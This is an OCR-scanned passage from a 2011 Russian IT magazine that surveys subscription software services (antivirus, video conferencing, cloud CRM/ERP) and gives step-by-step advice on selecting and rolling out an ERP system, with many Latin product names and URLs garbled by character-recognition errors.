Дополнительно они интегрируются с социальными 
сетями вроде РасеЬоок и ЫпкесІІп ( ), 

используя их для сбора информации и постинге 
объявлений о свободных вакансиях. ЫпкесІІп — это 
специализированный сервис для поиска деловых 
контактов, содержащий базу из более чем 85 000 000 
учетных записей в различных сферах бизнеса. 



Антивирус во временное 
пользование 

Антивирусные компании не оставили без внимания новую 
и весьма перспективную нишу. Если буквально парулет 
назад подобные предложения можно было пересчитать 
по пальцам одной руки, то сегодня для многих это одно из 
основных направлений в развитии. 

Рассмотрим три сформировавшиеся в этом плане на- 
правления. Российские компании организацию сервиса 
полностью отдали на откуп провайдерам, сами же они за- 
нимаются исключительно разработкой и учетом лицензий 
:). Сегодня большинство провайдеров предоставляют под- 
писки на Ог.ѴѴеЬ АѴ-йезк [ сІгѵѵеЬ.сопп/заазЛіпсІ ргоѵісіег/ 
ЬіД . КазрегзкуБиЬзсгірІіопБегѵісез ( казрегзку.ги/кзз ), 
Оиірозі АѴБегѵісе ( адпіІипп.ги/ригсЬазе/аѵ-зегѵісе ) и 
Е5ЕТ N0032 ( езеІпосШ.ги/.зоІиІіопз/ізр/Іізі ). Все они 
предлагают несколько тарифов, отличающихся функцио- 
налом, и систему скидок. В качестве клиентов поддер- 
живаются ѴѴіпсІоѵѵз всех известных современной науке 
версий. Разумеется, между предлагаемыми услугами есть 
отличия. Так, Ог.ѴѴеЬ можно установить только на х86 ОС, 
клиент не содержитфайера, но предлагаетвеб-консоль, 
при помощи которой можно отслеживать статистику, 
что делает его удобным для применения в организа- 
ции. Пользователь, выбравший продуктЛаборатории 
Касперского, получает стандартные продукты — Анти- 
вирус Касперского 201 1 , Казрегзку Іпіегпеі Зесигііу 201 1 
и Казрегзку СРѴ5ТАІ_ с полной технической поддержкой 
и регулярными обновлениями. Причем возможна даже 
тарификация по дням, но централизованноеуправление 
не предусмотрено. 

Обновления клиентов производятся индивидуально, по 
внутреннемутрафику, который, какправило, нетарифици- 
руется. 

Компании-разработчики антивирусов МсАІее, Р-5есиге 
и Рапба самостоятельно реализовали ѵѵеЬ-сервисы — 
сторонние фирмы л ишьторгуют лицензиями. Причем 
Рапба выделяется своим «облачным» антивирусом Рапсіа 
Сіоисі Апііѵігиз ( сіоисіапііѵігиз.сопп/гі ). ориентированным 
на персональное использование. Подозрительные файлы 
отсылаются для проверки на сервер — это позволяет 
разгрузить клиента, а компания, в свою очередь, получает 
разветвленную сеть сенсоров, которая быстро отлавлива- 
ет новую заразу. На корпоративное применение рассчитан 
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Подключаем почту Яндекс для своего домена 

Рапсіа Сіоисі Ргоіесііоп ( сіоисі ргоіесііоп. рапсіазесигііѵ. сопл ), реализо- 
ванный втрех вариантах — Рапсіа Сіоисі ОГГісе Ргоіесііоп, Рапсіа Сіоисі 
Етаіі Ргоіесііоп и Рапсіа Сіоисі Іпіегпеі Ргоіесііоп. Последние два 
представляют собой сервисы, обеспечивающие защиту интернет- и 
почтового трафика. Клиенты попросту используют их как прокси. А вот 
Рапба Сіоисі Оііісе Ргоіесііоп можно назвать традиционным вариан- 
том. Клиент, установивший агента, получаетантивирусную и проак- 
тивную защиту файлов, электронной почты/ІМ и НТТР/РТР-трафика; 
эвристический анализатор, персональный брандмауэр с ЮЗ, детектор 
червей, систему НІР8. Плюс все наработки облака Рапсіа Сіоисі 
Апііѵігиз. Централизованноеуправление настройками и обновления- 
ми производится при помощи локализованной веб-консоли, что дела- 
ет Рапсіа Сіоисі Оііісе Ргоіесііоп удобным средством для применения 
в качестве корпоративного антивируса. Важно, что обновление боль- 
шого числа систем неувеличиваеттрафик. Первый клиент, скачавший 
новые файлы, самостоятельно их раздает в локальной сети. 

Также просты в использовании Р-5есиге Ргоіесііоп Бегѵісе Іог 
Визіпезз ( І-зесиге.сот/еп УЗ/ргосІисІз/Ьизіпезз/зесигіІѵ-аз-а- 
зегѵісе/ ) и МсАІееБааБ Епсіроіпі Ргоіесііоп [ тсаІееазар.сот/БС ]. 

Видеоконференции Сізсо ѴѴеЬех 

Различные совещания и планерки являются неотъемлемой частью 
процесса управления любой компанией. С их помощью руководство 
доводит до подчиненныхсвоитребования, а единовременное при- 
сутствие большого количества сотрудников позволяетобменяться 
мнениями и выбрать наиболее эффективное решение. Но чтобы со- 
браться вместе, участники должны оторваться отосновной деятельно- 
сти и потратить некоторое время на дорогу. В таком случае актуальным 
становится применение систем конференц-связи, среди которых осо- 
бая рольотводится видеоконференциям. Корпорация Сізсо, выкупив 
в 2007 году продукт ѴѴеЬех, представила вскоре сервис Сізсо ѴѴеЬех 
( ѵѵеЬех. сот ), обеспечивающий проведение аудио- и видеоконферен- 
ций из любой точки мира. Кстати, на сегодня Сізсо ѴѴеЬех занимает 
более 50% рынка. В рамкахтехнологии реализовано несколько прило- 
жений, позволяющих создать среду, ориентированную на конкретные 
задачи — совещания, тренинги, обучение, техподдержку и общение 
(ІМ, почта, ѴоІР, видео). Плюс, разумеется, заметки, опросы и инстру- 
менты для обмена файлами. 

Интеграция с М3 Оііісе дает возможность обмениваться файлами 
одним щелчком мышки. Для удобства пользователей предложен 
размещающийся прямо на странице іѲоодІе гаджет, на котором будут 
отображаться приглашения на конференции, кнопка для старта и 
планирования. 
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Интерфейс Сізсо ѴѴеЬЕх 




Дополнительные приложения для Ооодіе Арр$ 
Магкеіріасе 



Чтобы начать работу, необходимо лишь оформить подписку и разо- 
слать приглашения в виде ІІРІ_, при выборе которого будетзагружен 
и запущен Мееііпд Сепіег. Всего в конференции могут участвовать до 
пятисот пользователей, что достаточно для большинства потребностей 
любой организации. Характеристики видеопотока: 64Ох36О03О1р5. 
Одновременно выводится видео восьми участников. При необходимо- 
сти конференцию легко записать на сервер, с возможностью после- 
дующего доступа ко всем материалам. 

Общение и управление функциями ѴѴеЬех производится при помощи 
простого интуитивного интерфейса, для доступа к конференции по- 
требуется лишь веб-браузер. Поддерживаются и некоторые смартфо- 
ны (ВІаскВеггу, ЗутЬіап, ѴѴіпсІоѵѵз МоЬіІе и Арріе Ю5). Интерфейс не 
локализован, но пользователь, владеющий базовым английским, без 
труда найдет нужные кнопки. 

Подписка стоит более чем умеренно, безлимитный доступ обойдется от 
$49 в месяц, при этом к одному хосту можно одновременно подключить 
25 пользователей. 

Популярными альтернативами Сізсо ѴѴеЬех являются АсІоЬе Соппесі 

( асІоЬесоппесІ.ги ). Місгозоіі Оііісе І_іѵе Мееііпд ( тісгозоіі.сопп/опііпе/ 
оііісе-ііѵе-тееііпд.азрх ). Зкуре и другие. 

Отдельного внимания заслуживает разработка СіІгіхОоТоМееІіпд 
( оіотееііпд.сот ). запущенная в 2004 году. С ее помощью можнотак- 
же проводить веб-конференции, общаясь с другими людьми в режиме 
реального времени (втом числе ѴоІР), и записывать обсуждение для 
дальнейшего воспроизведения. Крометого, она содержит средства 
для рисования на экране и генерации отчетов, плюс предоставление 
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Настройка политики сканирования в Рапсіа СІоисІ 0№се 
Ргоіесііоп 

общего доступа к отдельным приложениям и возможность просматри- 
вать рабочий стол удаленной системы. Поддерживается три версии 
продукта — базовая ОоТоМееііпд (до 1 бучастников], ОоТоѴѴеЬіпаг 
(вебинары до 1000 человек) и самая функциональная — ОоТоМееііпд 
Согрогаіе. 

Облачный СРМ и ЕРР 

Чтобы оптимизировать работу с клиентами, многие компании смотрят 
в сторону СРМ (Сизіюппег КеІаЬопзЬір Мападетепі Бузіет, система 
управления взаимодействием с клиентами). Об общих проблемах вне- 
дрения СРМ рассказано в статье «Охота на покупателя» в ][ 04.201 1 . 
Учитывая, что процент действительноудачных внедрений можно 
назвать невысоким, использование БааБ вместо покупки коробочной 
версии позволитснизить риск неудачного вложения. Подписчики по- 
лучаютполный пакет администрирования, включающий втом числе 
резервное копирование с долгосрочным хранением и возможностью 
быстрого восстановления, высокий аптайм серверов, гарантирован- 
ную доступность. Клиент подключается при помощи веб-браузера (в 
том числе и с мобильного устройства), из любой точки, где есть доступ 
к интернет. Соединение шифруется при помощи 55І_. Защищен- 
ность дата-центров провайдера на порядок выше, чем в небольших и 
средних организациях. Кроме этого, 8аа5 спасает от различных форс- 
мажорных обстоятельств, которыми порой такбогата наша корпора- 
тивнаяжизнь. 

Аналитики багіпег предсказывают существенный ростБааБ, причем 
доля СРМ здесь будет достигать трети. Поэтому неудивительно, что 
БааБ СРМ предлагаются очень широко и заметна большая актив- 
ность на этом рынке. Среди решений особо популярны МеІБиіІе СРМ 
( пеізиііе.сот ), ЗаІеРогсе ( заіезіогсе.сот ) или «Мегаплан» ( тедаріап. 
ШІ- Кстати, ЫеіБиіІе СРМ предлагает свои услуги с 2009 года и по 
версии 6агІпегвходитвтоп-20лучшихСРМ-систем в мире, а прибыль 
БаІеЕогсе приближается к миллиарду. Российский «Мегаплан» досту- 
пен и какБааБ, и в коробочном варианте, поэтому если СРМ «пойдет», 
можно легко перейти на другую версию. 

Функционал БааБ при необходимости подстраивается под нужды 
клиента. Так, базовая ЫеіБіііІе СРМ включает в стандартную поставку 
следующие модули: управление продажами, поддержка клиентов, 
возможность проводить маркетинговые кампании, расширенное 
прогнозирование и анализ, управление контактами, документами и 
такдалее. Версия СРМ+ дополнительно содержит модули управления 
проектами, заказами, бонусами, претензиями, а также аналитический 
модуль для управления отношений с партнерами. 

Клиенты получают бизнес-портал, на котором они могутзадавать во- 
просы, искать товар, оформлятьзаказы. Версия С РМ+ содержит также 
СМ5, при помощи которой можно создать веб-сайт, функционально 
связанный с СРМ. Система расширяема, инструменты даютвозмож- 




Демоверсия СРМ ЫеІЗиііе 




ность создавать новые программные модули внутри СРМ. Для связи 
с другими приложениями используется протокол 5ітіЬХМІ_ (Бтаіі 
Визіпезз ЕхІепзіЫе Магкир Бапдиаде) или веб-сервис. Дополнитель- 
но проект предлагает платформу Ы5-В05, позволяющую создавать 
приложения, взаимодействующие с ЫеіБиіІе. 

Кроме этого, ЫеіБиіІе предлагает и другие продукты, реализованные в 
виде БааБ — ЕРР (содержит модули управления проектами (Р5А), ре- 
сурсами предприятия и модули электронной торговли), ОпеѴѴогШ (ЕРР 
для средних компаний и холдингов, позволяющая управлять бизнесом 
в реальном времени), системууправления проектами ОрепАіги сервис 
для аналитики плуОІАІ_5. 

На сайте ЫеіБиіІе, да и любой другой из описываемых СРМ, можно 
получить тестовый доступ к системе, а также выложено несколько 
ролевыхдемоки бесплатных онлайн-курсов, позволяющих составить 
представление о продукте. 

Реализация «Мегаплана» интересна тем, что работа с СРМ через брау- 
зер напоминаетиспользование настольного приложения. 

Несколько отдельно стоит БааБ-продукт, предлагаемый ВідМасЬіпез 
( ЬідтасЬіпез.сот ) и позволяющий более рационально конфигуриро- 
вать массовый продукт под потребности индивидуального заказчика. 
При этом ВідМасЬіпез легко интегрируется с СРМ- и ЕРР-системами. 

Заключение 

«Программа каксервис» — это (относительно) новая и активно раз- 
вивающаяся модель доставки ПО конечному пользователю. И, как 
видишь, на сегодня большинство приложений можно без особых про- 
блем вынести за пределы офиса, сократив первоначальные затраты и 
снизив риск, втом числе — из-за неправильной настройки. т 
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■ ■ Андрей Полыгаев (роіудаеѵгадтаіі.сот, I СО 284491726) 




ЕКР по-взрослому 

Как добиться успеха при автоматизации 
бизнес-задач? 

Полезность современных Иагсіѵѵаге- и зоЯл/ѵаге-систем состоит в том, чтобы с помощью этих ин- 
струментов решать важные для их владельцев задачи. Если речь идет о бизнесе, то тут ИТ — это 
средство повышения эффективности работы компании за счет автоматизации рутинных процес- 
сов, упрощения коммуникаций и обмена информацией, беспрецедентных возможностей доступа и 
анализа данных для принятия правильных управленческих решений. 



Базисом, на котором строится ИТ- инфра структура компании, явля- 
ется ЕРР-система. Википедия дает нам следующее определение 
ЕРР: «ЕРР-система (англ. Епіегргізе Резоигсе Ріаппіпд Зузіепп, 
Система планирования ресурсов предприятия) — это интегриро- 
ванная система на базе ИТ для управления внутренними и внеш- 
ними ресурсами предприятия (значимые физические активы, 
финансовые, материально-технические и человеческие ресурсы). 
Цель системы — содействие потокам информации между всеми 
хозяйственными подразделениями (бизнес-функциями) внутри 
предприятия и информационная поддержка связей сдругими 
предприятиями. Построенная, какправило, на централизованной 
базе данных, ЕРР-система формирует единое стандартизиро- 
ванное информационное пространство предприятия.» Ключевая 
задача ЕРР-системы, приведенная в данном определении — «... 
формирование стандартизированного единого информационного 
пространства предприятия». 

Попробуем разобраться, какже сделать так, чтобы ЕРР-система в 
вашей компании идеально выполняла эту функцию - сформиро- 
вать единое информационное пространство предприятия. 

Как выбрать и внедрить ЕРР 

Выбираем область для автоматизации 

Ключевым фактором успеха при решении данной задачи (до- 
биться успеха при автоматизации бизнес-процессов) является 
правильная последовательность проведения автоматизации. Или 
то, что называется «делать правильные вещи правильно». Давай 
рассмотрим это подробнее: 

Готовим бизнес-требования. 

Если в компании возникает идея «автоматизировать это» — зна- 
чит, джин ЕРРуже выпущен из бутылки, и рано или поздно всем 
сотрудникам придется узнать все прелести проекта внедрения 
ЕРР-системы. Как правило, идея автоматизировать возникает 
применительно к какому-либо процессу (учеттоваров на скла- 
де) либо области деятельности компании (например, сервис по 
доставке заказов из интернет-магазина). Это и является клю- 
чом к первому шагу успешно го внедрения ЕРР - определение 
бизнес-требований к будущей системе. Исходя из выявленной 
потребности в автоматизации, необходимо сформулировать, какие 
задачи должна будет решать ЕРР-система, какие процессы будут 
автоматизированы, какие результаты мы хотим получить после 
внедрения. Все это, естественно, нужно оформить в виде докумен- 
та, назвав его «Бизнес-требования компании N к ЕРР-системе». 
Крайне желательно, чтобы данный документ содержал следующие 
разделы: 

• краткое описание профиля компании, деятельность которой 
предстоит автоматизировать; 



• перечисление подразделений, процессов и задач, которые 
необходимо автоматизировать (так называемые объекты автома- 
тизации); 

• границы процесса автоматизации: временные (проект автомати- 
зации должен быть завершен до ...), территориальные (автомати- 
зации подлежат все филиалы компании врегионахЫ и М), органи- 
зационные (проект реализуется в подразделении N холдинга М); 

• бизнес- цель автоматизации, краткое описание того, что бы 
мы хотели получить в результате внедрения ЕРР, при этом цель 
должна быть конкретной, достижимой и измеримой: например, 
сократитьдо N часов время исполнения клиентских заказов в пре- 
делах МКАД с момента приема заказа до передачи заказа клиенту 
и внесения данных об операции в ЕРР-систему. 

• ожидаемые результаты от внедрения ЕРР: формулируем, что бы 
мы хотели получить после внедрения (установленную и настроен- 
ную систему, обученный персонал, интеграцию ЕРР с бухгалтер- 
ской программой итакдалее). 

Подготовка подобного документа ловит сразу нескольких зайцев: 

• на этапе его подготовки мы осмысливаем наши проблемы, по- 
требности, ожидания и более четко представляем себе, чего же мы 

ХОТИМ; 

• у нас появляется основа для следующего шага - формирования 
функциональных требований к ЕРР системе; 

• данный документ позволит нам сэкономить на этапе пред про- 
ектного обследования, с которого обычно начинается внедрение 
ЕРР, так как значительная часть работ данного этапа уже будет 
выполнена при подготовке документа. 

И последнее. Нелишним будет ознакомиться (хотя бы подиагона- 
ли)с серией ГОСТов 34, которые описывают порядок выполнения 
работ при автоматизации объектов. ГОСТ хотя и старый, лохматого 
80-го года, однако содержит достаточно конкретную и дельную 
информацию по реализации подобных проектов. 

Рассчитываем экономический эффект. 

Один из наиболее важных и при этом трудных для подготовки ЕРР- 
проекта блоков - расчет ожидаемого экономического эффекта. 
Миновать его практически невозможно. При этом масштаб зсоре 
вашего проекта будет зависеть от размеров бизнеса, амбиций 
ИТ- руководства, ситуации нарынкеимногих других факторов. В 
каких-то случаях дело ограничится внедрением типовой конфи- 
гурации «Управления производственным предприятием» 1 С, а в 
каких-то речь будет идти о внедрении ЗАР. Еще раз подчеркну, что 
определяющим здесь является размер бизнеса, который мы со- 
бираемся автоматизировать, и доступный нам ИТ-бюджет, а также 
амбиции руководителей, поддерживающих и инициирующих этот 
процесс. Слово «амбиции» можно заменить на более политкор- 
ректное — «видение». 
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Естественно, степень проработанности материалов по расчету 
экономического эффекта прямо пропорциональна запрашиваемому 
бюджету - с ростом последнего растут и требования к расчету эконо- 
мического эффекта. На край них точках этой зависимости лежит про- 
стой расчет в Ехсеіс одной стороны и документ, приближающийся к 
формату бизнес-плана, с другой. Последний вариант актуален, когда 
система ЕРР выступает как некий инвестиционный проект. 
Остановимся на нескольких, наиболее популярных методиках рас- 
чета экономического эффекта внедрения ЕРР: 

• Инвестиционные методы оценки проекта, основанные на рас- 
чете показателя РОІ — Реіигп о^ Іпѵезіппепі. При использовании 
данного метода рассчитываются инвестиции, необходимые для 



Александр Лозовский, 
редактор рубрики 



Некоторые коллеги (не будем показывать пальцем на Андрея 
Матвеева) считают, что эта рубрика должна быть стопроцентным 
клоном рубрики ІІпіхоісІ - в том смысле, что здесь должно быть 
максимум статей про то, как вкорячить какой-нибудь халявный 
корпоративный софт, но не на десктоп, а на линуксовый сервер. 
Но, собственно, почему? Серьезная рубрика — так серьезная 
рубрика. Попробуем опубликовать статейку для старших 
пацанов — вдруг понравится? :) А если у тебя есть жалобы, 
предложения и пожелания, мое мыло традиционно открыто 
для твоих отзывов: Ішоѵзкуйдіс.ги. Кстати, наша фокус-группа 
( ) также открыта для них. 

Промо-микс продвижения ИТ-проекта в компании 



реализации проекта, и возможные доходы после его реализации. 

В качестве показателей, учитываемых при определении дохода, 
рассматриваются увеличение продаж и снижение себестоимости. 
Существенным недостатком данного метода является направлен- 
ность только на финансовые показатели, но его можно и нужно 
использовать при инициации крупных проектов, требующих за- 
щиты перед инвесторами, поскольку в этом случае разговор идет 
на понятном им языке. 

• Метод СВА- Со5*-ВепеЛ*5 Апаіузіз. Является одной из разно- 
видностей инвестиционного метода оценки эффективности. Этот 
метод более применим при реализации проектов, так как изна- 
чально был разработан именно под них. Данный метод имеетдве 
существенные особенности. Рассмотрим их подробнее. 

1. Возможность учета не только количественных, но и качествен- 
ных показателей. Например - повышение лояльности клиентов за 
счет сокращения времени обслуживания. Качественный показа- 
тель с помощью экспертных оценок приводится к количественному 
значению. Далее этот показатель с определенным весом учитыва- 
ется в итоговой оценке. 

2. С цена рн ость означает, что при использовании метода СВА 
рассчитывается несколько сценариев выполнения проекта и, 
соответственно, достигаемых целей. Для каждого из сценариев 
формируется итоговая оценка, которая сравнивается с оценками 
других сценариев, после чего выбирается оптимальный вариант. 

• Проектные методы оценки эффективности. Производители 
программного обеспечения не хотят оставаться в стороне от та ко го 
важного элемента бизнеса, как оценка эффективности, и потому 
предлагают свои методы. Например, Місгозоіі разработала и про- 
двигает метод Быстрой оценки эффективности — РарісІ Есопоппіс 





Прямые 


Косвенные 


Рациональные 


Расчёт финансовой эффективности проекта (в виде 
бизнес-плана или расчёт эффективности по СВА-, ВЫ- 
методам 


Результаты бенчмаркинга по аналогичным проектам в 
отрасли. Данные с конференций и выставок 


Эмоциональные 


Презентация проекта. 


Неформальное продвижение проекта в общении с 


Проблемы/сбои существующей ИТ-системы 


Коллегами 
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Рыночная 

ситуация и тренды 



Кнл лнфикл цин и 
опыт сотрудников 



Амбиции 

рукоиодства 



Рыночные цели и 
стратегия 
компании 




Факторы, влияющие на масштаб проекта ЕВР 




^зіібсаііоп (НЕЛ Этот метод предлагает шесть шагов по оценке 
эффективности проекта: 

1. Определение бизнес-требований. 

2. Формирование «карты решений». 

3. Оценка выгод от реализации проекта. 

4. Оценка затрат на реализацию проекта. 

5. Оценка рисков проекта. 

6. Расчет финансовых показателей и формулировка предложений 
по проекту. 

При этом надо отдать должное МісгозоЙ, степень проработки и 
поддержки данной методики достаточно высока, а самое главное 
— они предоставляют шаблон и руководство по практическому 
применению данного метода. 

Какой метод расчета эффективности выбрать - решать тебе. 

Важно, чтобы в итоговой оценке не было «притянутых за уши» 
показателей, даже если по результатам расчета окажется, что 
реализация проекта бессмысленна. 

Защищаем проект 

После того как определены бизнес-требования к проекту и рас- 
считана эффективность, прямая дорога в кабинет босса — за- 
щищать проект перед руководством компании. Однако перед тем 
как сделать этот шаг, неплохо бы, что называется, подготовить 
плацдарм. Проект ЕРР — это почти всегда не просто ИТ-проект, а 
процесс, который затрагивает ключевые подразделения компа- 
нии. А следовательно, мнение и поддержка этих ключевых людей 
будет важна и нужна нам на каждой стадии проекта. Поэтому 
формирование позитивного восприятия проекта в компании очень 
важно. Стало быть, этой части марлезонского балета следует 
уделить особое внимание. При формировании восприятия необ- 
ходимо задействовать все доступные средства: как рациональные 
(указанный выше расчет эффективности, результаты бенчмаркин- 
га по аналогичным проектам в отрасли и у конкурентов), так и эмо- 
циональные - грамотно подготовленная и красиво проведенная 
презентация, а также предшествующее ей неформальное общение 
с коллегами на тему «так дальше нельзя» и «надо что-то менять». 
Рекомендуемый нами промо-микс активностей по продвижению 
проекта в компании представлен на соответствующем рисунке. 



Определяем круг модулей ЕРР 

Формируем функциональные требования. 

Если поход к боссу и защита проекта прошли успешно, то тебя 
можно поздравить с прохождением первого уровня. Но нужно 
понимать, что все самое интересное еще впереди... Следующий 
важный шаг, который тебе предстоит сделать, это сформировать 
функциональные требования к системе ЕРР. Фактически это 
означает, что от бизнес-требований, изложенных на предыдущих 
этапах, придется опуститься на уровень технического решения 
и определить, с помощью каких функций планируется достигать 
поставленных целей. Функциональные требования, отталкиваясь 
от бизнес-требований, по факту являются зеркалом тех бизнес- 
процессов, которые предполагается автоматизировать. 
Продемонстрируем это на следующей цепочке: выше мы сформу- 
лировали следующую цель проекта «сократить время исполнения 
клиентских заказов (в пределах МКАД) до N часов с момента 
приема заказа и до момента передачи заказа клиенту и внесения 
данных об операции в ЕРР систему». 

Данная цель подразумевает, что будет затронут процесс выполне- 
ния заказов - Огбег ргосезБІпд. Этот процесс в типовом варианте 
(например, доставка клиентского заказа интернет-магазином) 
состоит из подпроцессов: прием заказа, обработка заказа и вне- 
сение данных в ЕРР-систему, сборка заказа на складе, доставка 
заказа клиенту, проведение исполненного заказа в ЕРР-системе. 
Предполагается, что в этом случае наша ЕРР-система должна 
поддерживать все указанные подпроцессы. Кроме того, прием 
заказов у нас может осуществляться несколькими способами: 
через интернет-магазин, операторами по телефону, от партнеров 
(например, розничных точек, принимающих заказы на доставку). 
Соответственно, появляются следующие функциональные требо- 
вания: 

• ЕРР-система должна поддерживать интеграцию и автоматиче- 
скую загрузку заказов с сайта; 

• ЕРР-система должна иметь интерфейс ввода заказов операто- 
рами, при этом мы можем и должны сформулировать требования 
по эргономике интерфейса ввода (например, большая красная 
кнопка «Принять заказ», обязательное для заполнения поле «До- 
полнительный стационарный телефон», автоматический расчет 



► 124 



ХАКЕР 05 /148/ 201 1 




сГіаІклфагэ 



Іеаііег» 



■Э.І 

а 



ВДВ ЕП№фГіМ 

СИчсі* ДЭ ЕсЬгаітй» Еп!»фгімОпі- 

^ (^ІМРОРіЕИРЗуК 


А 

4^МіегпнлЙ Вупвгпіся- АХ 


Цф Огэ&Іе €■ ЗиКо 

ф фмизч?»!! Втігпн 

Едас Окйе 

ЦілшлШ Ег 

ЁКР ін 


Видней ДіМп-Опе 
Я ^ АѴ ф Ерклзг Ѵап&эд* 

Іегргіін Миг-іийе-іімчіі 

) 



пкН* ріиуегя 



ѵівіопигіея 
СотрШзгь&ЁасэГѵіёІол - 



Источник: йлп пег. Мни 2009 

Магический квадрат Гартнер — ЕВР 2009 



возможной сдачи, которую надо будет иметь курьеру 
при доставке и так далее); 

• ЕРР-система должна иметь интерфейс интеграции с 
ЕРР-системами партнеров через ЕБІ (например, через 
е-СосІ]. 

Подобным образом надо транслировать все бизнес- 
цели. При этом надо иметь в виду, что функциональных 
требований значительно больше, чем бизнес-целей, 
поэтому такой перевод — задача непростая, требующая 
определенного опыта и навыка. В качестве помощников 
тут могут выступить будущие поставщики ЕРР-системы, 
которые на этапе предпродажи почти всегда готовы по- 
мочь и, что самое приятное, пока забезденег :). 

Выбираем необходимые модули. 

Выявленные выше функциональные требования фак- 
тически определяют необходимый нам набор модулей 
ЕРР-системы. Большим подспорьем здесь может 
служить карта решений отЗАР. Эта компания является 
несомненным лидером в области б из нес- решений, и 
потому предлагаемая ей карта решений может служить 
эталоном, по которому следует определить, какие же 
модули нам нужны. На представленном рисунке при- 
веден пример карты решений от ЗАР для СРМ. 

Выбираем подходящую нам ЕРР 

Составляем Іопд Іізі подходящих систем. 

После того как мы определили функциональные 
требования кбудущей системе и набор необходимых 
модулей, можно переходить непосредственно к выбору 



конкретной ЕРР-системы. В этом деле нам помогут 
два ключевых источника: Магический квадрат Гартнер 
Групп и обзор рынка от РБК. И тот, и другой распро- 
страняются за деньги, но при определенном желании 
ты всегда сможешь нагуглить пусть и не последний, но 
вполне адекватный материал. На основании данных 
материалов можно выбрать те системы, которые имеет 
смысл включить в Іопд Іізі — обычно это от пяти до 
десяти систем. Основная цель составления Іопд ІізГа - 
сузить число рассматриваемых вариантов до приемле- 
мого количества (слово «приемлемое» означает, что на 
этапе выбора ты сможешь просмотреть и оценить все 
выбранные системы). При этом желательно, чтобы Іопд 
Іізі: содержал разные сегменты решений. Например, 
отечественные и зарубежные системы, традиционные 
лидеры рынка и новые продукты, комплексные системы 
«все в одном» и модульные системы. Такой подход ловит 
сразу нескольких зайцев: дает возможность проводить 
оценку в разных плоскостях, оценить достоинства лиде- 
ров и перспективы новичков, получать широкий набор 
информации о возможностях современных систем. 

Определяем критерии выбора ЕРР системы. 

Составив Іопд Іізі:, мы получим некоторое представ- 
ление о текущем состоянии рынка и потенциальных 
кандидатах для выбора. Это позволит определить 
критерии выбора ЕРР-системы. Обычно критерии 
выбора формируют в виде ехсеі-та блицы, в которой 
присутствует несколько групп параметров: стоимость 
решения, функциональность решения, оценка по- 
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• Внедрение ЕРР — 
как оценить результат 
на старте: сопзиІГги . 

• Эволюция 
показателей СВА: 

ЬПр://доо.д[/7ВГіп8 . 

• Виіісі ап аіНідЫ: 
Ьизіпезз сазе Гог пеѵѵ 
ІТ іпѵезітепіз: 

ЬЦр://доо.д[/ЦЕ08К ; 

• Мадіс ОиасІгапІ 
Гэг Мібтагкеі: апб 
Тіег 2-ОгіепГесІ ЕРР 
Гэг Ргобисі-Сепіхіс 
Сотрапіез: 
дагіпег.сот : 

• Аналитический 
обзор российского 
рынка ЕРР-систем 
по итогам 2009 года: 
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Структура ИТ-системы компании (решение от Са-РІиз 
Визіпезз зоІиНоп) 

ставщика решения. Каждой группе параметров назначается вес 
в итоговой оценке, а группа параметров раскладывается на эле- 
менты. Например, группа «Стоимость решения» может состоять из 
следующих элементов: стоимость лицензии на сервер, стоимость 
лицензии на рабочее место, стоимость сопровождения, стоимость 
необходимого оборудования и так далее. Какие-то параметры 
могут иметь абсолютные значения (как правило, это относится к 
группе стоимостных показателей), какие-то будутоценены экспер- 
тно (как, например, функциональные). Затем таблица заполняется 
экспертами и рассчитываются итоговые значения для каждой из 
оцениваемых ЕПР-систем. 

Знакомимся с выбранными системами 

Составив Іопд Из!, мы сможем приступить к проведению встреч 
с представителями поставщиков решений. Целью этих встреч 
является получение более полной информации о рассматривае- 
мой системе и знакомство с поставщиком. При этом вторая задача 
не менее важна, чем первая, та к как пол овина успеха проекта по 
внедрению ЕРР зависит от консультанта, а фактор «нравится/не 
нравится» играет в этом весьма немаловажную роль. Можно дать 
несколько практических советов по проведению подобных рабо- 
чих встреч: 

1 . Составь и согласуй график встреч заранее, при этом желательно 
провести их плотным циклом - не менее двух встреч в неделю, что- 
бы впечатления от встреч были достаточно свежими и позволяли 
провести сравнение. 

2 . Привлекай на встречи сотрудников — будущих участников 
проекта, это позволит им почувствовать свое участие в проекте 
и ответственность за его выполнение. Крометого, широкий круг 
участников порождает широкий круг непростых вопросов, ответы 
на которые позволят оценить и систему, и консультанта, а также 
выявят потенциальные риски будущего проекта. 

3. Заранее определи вопросы, которые необходимо задать 
консультантам. При этом хорошо бы иметь небольшой тест-кейс, 
который консультанты должны решить во время встречи. Напри- 
мер, предложи им продемонстрировать возможности настройки 
интерфейса под требования пользователя. 

4 . Настаивай на том, чтобы демонстрация продукта выполнялась 
на живой системе, а не с помощью слайдов со скриншотами про- 
граммы. Данный пункт пояснения не требует. 

Сокращаем Іопд Из* в због* Ііз* 

По итогам рабочих встреч, ознакомления с функциональностью 
продуктов и анализа предоставленных консультантами материа- 



лов мы получим некоторое представление о каждом из предла- 
гаемых решений. Это позволит исключить явных аутсайдеров и 
оставить 2-4 системы для окончательного выбора. Процедурно 
это лучше всего выполнить через подготовку ПЕР - Педиезі бог 
Ргорозаі (запрос предложения), рассылку его кандидатам и полу- 
чение предложений. Именно данные предложения, плюс указан- 
ные выше данные, служат источником для конечного решения. В 
предложении, кроме всего прочего, предоставляется более-менее 
конкретная оценка стоимости предлагаемого решения. Результа- 
том данного шага является подготовленный зЬогІ ІізЕ Основная 
цель збогі Іізі: — обеспечить конкуренцию между поставщиками на 
этапе окончательного согласования условий договора. 

Уточняем функциональныетребования и критерии оценки. 

Перед тем как приступить к следующему шагу, необходимо 
уточнить функциональные требования и, возможно, критерии 
оценки. Необходимость в этом появится после ознакомления с 
предложениями поставщиков. Станет ясно, что какие-то требова- 
ния не будут реализованы, какие-то - стоит переформулировать. 
Что касается критериев оценки, то понимая, какие системы будут 
сравниваться, важно обеспечить сравнимость этих систем по вы- 
бранным параметрам. Например, если в збогі Іізі попали тради- 
ционные лицензируемые системы и системы 5аа5, то понятно, что 
сравнение по группе показателей «Стоимость» надо выполнять не 
по традиционным пунктам (стоимость лицензии сервера, стои- 
мость клиентской лицензии), а на основе стоимости владения 
системой в течение длительного периода, например 5- 7 лет. 

Проводим конкурентные переговоры 

Уточнив функциональные требования и критерии оценки, можно 
переходить к конкурентным переговорам с поставщиками. Цель 
данного этапа - получить более выгодное предложение от постав- 
щика за счет конкуренции с другими кандидатами. Схем проведе- 
ния конкурентных переговоров много, среди современных мето- 
дов заслуживаетупоминания аукцион на электронной площадке. 
Данный инструмент позволяет легко и быстро провести торги на 
понижение, при этом обеспечив очень высокую прозрачность 
